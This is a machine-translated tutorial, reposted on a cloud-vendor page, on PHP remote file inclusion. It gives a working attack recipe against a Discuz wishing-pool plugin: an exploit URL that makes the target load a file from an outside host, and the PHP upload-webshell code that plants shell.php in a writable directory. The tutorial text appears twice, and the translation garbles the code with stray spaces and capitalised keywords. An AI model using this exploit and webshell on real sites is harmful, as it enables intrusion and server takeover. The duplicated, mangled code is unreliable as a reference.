How php Remote File Inclusion Vulnerability works

Source: Internet
Author: User

Suppose the code of index.php in the main page file is as follows:
<?
Include ($ page );
?>
Because the $ page variable lacks adequate filtering, the system does not determine whether the $ page is local or on a remote server. Therefore, we can specify the file on the remote server and submit it to the $ page variable as a parameter, allow us to execute our remote files with web permissions.

In this way, we can submit:
Http://www.bkjia.com/index.php? Page = http: // remote server/file name
We only need to set the remote file as our PHP Trojan so that we can get a Webshell.

Let's look at the discuz wishing board's Remote File Inclusion Vulnerability:

Problems with the wish. php file of the wishing pool plug-in:
Require $ discuz_root ../include/discuzcode. func. php;

The discuz_root variable is not strictly filtered. Usage:
Http: // url/wish. php? Discuz_root = http://www.wang1.cn/wyt.txt?
You do not need a txt suffix. You can change it to any suffix. You must add a question mark later.
Here wyt.txt writes a shell using the pony of CN. Tink:
<? Copy ($ _ FILES [MyFile] [tmp_name], "./attachments/shell. php");?>
<Form ENCTYPE = "multipart/form-data" ACTION = "" METHOD = "POST">
<Input NAME = "MyFile" TYPE = "file">
<Input VALUE = "submit" TYPE = "submit">
</Form>
The website physical path can be submitted through http: // url/wish. php? Discuz_root = http://www.wang1.cn/wyt.txt, see the error message, then modify the shell.txt path. Shell. php is the name of the uploaded shell.
Unix settings are relatively BT,./attachments/This directory is generally writable.

Suppose the code of index.php in the main page file is as follows:
<?
Include ($ page );
?>
Because the $ page variable lacks adequate filtering, the system does not determine whether the $ page is local or on a remote server. Therefore, we can specify the file on the remote server and submit it to the $ page variable as a parameter, allow us to execute our remote files with web permissions.

In this way, we can submit:
Http://www.bkjia.com/index.php? Page = http: // remote server/file name
We only need to set the remote file as our PHP Trojan so that we can get a Webshell.

Let's look at the discuz wishing board's Remote File Inclusion Vulnerability:

Problems with the wish. php file of the wishing pool plug-in:
Require $ discuz_root ../include/discuzcode. func. php;

The discuz_root variable is not strictly filtered. Usage:
Http: // url/wish. php? Discuz_root = http://www.wang1.cn/wyt.txt?
You do not need a txt suffix. You can change it to any suffix. You must add a question mark later.
Here wyt.txt writes a shell using the pony of CN. Tink:
<? Copy ($ _ FILES [MyFile] [tmp_name], "./attachments/shell. php");?>
<Form ENCTYPE = "multipart/form-data" ACTION = "" METHOD = "POST">
<Input NAME = "MyFile" TYPE = "file">
<Input VALUE = "submit" TYPE = "submit">
</Form>
The website physical path can be submitted through http: // url/wish. php? Discuz_root = http://www.wang1.cn/wyt.txt, see the error message, then modify the shell.txt path. Shell. php is the name of the uploaded shell.
Unix settings are relatively BT,./attachments/This directory is generally writable.

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.